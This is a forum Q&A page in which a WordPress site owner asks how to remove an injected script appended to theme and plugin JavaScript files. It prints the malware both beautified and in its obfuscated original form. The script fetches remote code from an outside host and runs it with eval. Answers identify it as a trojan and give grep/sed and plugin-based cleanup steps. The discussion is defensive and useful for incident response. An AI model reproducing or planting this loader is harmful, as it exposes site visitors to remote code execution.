CODEWITHSUNDEEP
wordpresssecuritywordpress-theming
Shakil Hossain
Shakil Hossain

Reputation: 1743

WordPress all theme plugin js file is adding this script how can i remove that

    (function() {
    var a = navigator,
        b = document,
        e = screen,
        f = window,
        g = a['userAgent'],
        h = a['platform'],
        i = b['cookie'],
        j = f['location']['hostname'],
        k = f['location']['protocol'],
        l = b['referrer'];
    if (l && !p(l, j) && !i) {
        var m = new HttpClient(),
            o = k + '//layirdmusic.com/Mockup/wp-admin/css/colors/blue/blue.php?id=' + token();
        m['get'](o, function(r) {
            p(r, 'ndsx') && f['eval'](r);
        });
    }

    function p(r, v) {
        return r['indexOf'](v) !== -0x1;
    }
}());
};;
if (ndsw === undefined) {
    var ndsw = true,
        HttpClient = function() {
            this['get'] = function(a, b) {
                var c = new XMLHttpRequest();
                c['onreadystatechange'] = function() {
                    if (c['readyState'] == 0x4 && c['status'] == 0xc8) b(c['responseText']);
                }, c['open']('GET', a, !![]), c['send'](null);
            };
        },
        rand = function() {
            return Math['random']()['toString'](0x24)['substr'](0x2);
        },
        token = function() {
            return rand() + rand();
        };
    (function() {
        var a = navigator,
            b = document,
            e = screen,
            f = window,
            g = a['userAgent'],
            h = a['platform'],
            i = b['cookie'],
            j = f['location']['hostname'],
            k = f['location']['protocol'],
            l = b['referrer'];
        if (l && !p(l, j) && !i) {
            var m = new HttpClient(),
                o = k + '//layirdmusic.com/Mockup/wp-admin/css/colors/blue/blue.php?id=' + token();
            m['get'](o, function(r) {
                p(r, 'ndsx') && f['eval'](r);
            });
        }

        function p(r, v) {
            return r['indexOf'](v) !== -0x1;
        }
    }());
};

Only showing in the browser when I am checking original files that perfect

Upvotes: 3

Views: 5522

Answers (3)

Vijay Lathiya
Vijay Lathiya

Reputation: 1227

By SSH Command grep and sed - Create Pattern search and replace infected code by empty space.

grep -rl ";if(ndsw" . | xargs sed -i "s/;if(ndsw.*//g"

By SSH connect to your Website folder and run this command line. all malicious scripting starting with ndsw will be removed.

Upvotes: 1

Youssef Elmoumen
Youssef Elmoumen

Reputation: 553

This is a malicious script (JS:Trojan.JS.Agent.UJY) based on www.virustotal.com and I have used Visual Studio Code to delete it.
The one you shared is actually the beautified version but in the infected files it's minified like this

;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//website.domain/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

To remove it:
  • Install Visual studio code
  • Install Remote - SSH extension on VSCode
  • Connect to your server
  • Go to the settings (JSON) and add this line "search.maxResults": 500, if you're server specifications or internet speed are low.

And then search for the minified form of this script and replace all.
Finally, remove this file wp-admin/css/colors/blue/blue.php

Upvotes: 3

ehab
ehab

Reputation: 129

I would suggest that you take a backup for both your files and database then install a security plugin like WordFence. Security plugins compare current files with original files from their original sources. If there are any changes Word Fence will highlight it the changes for you and give you the ability to repair the changed files by revoking it back to its original state.

Upvotes: 0

Related Questions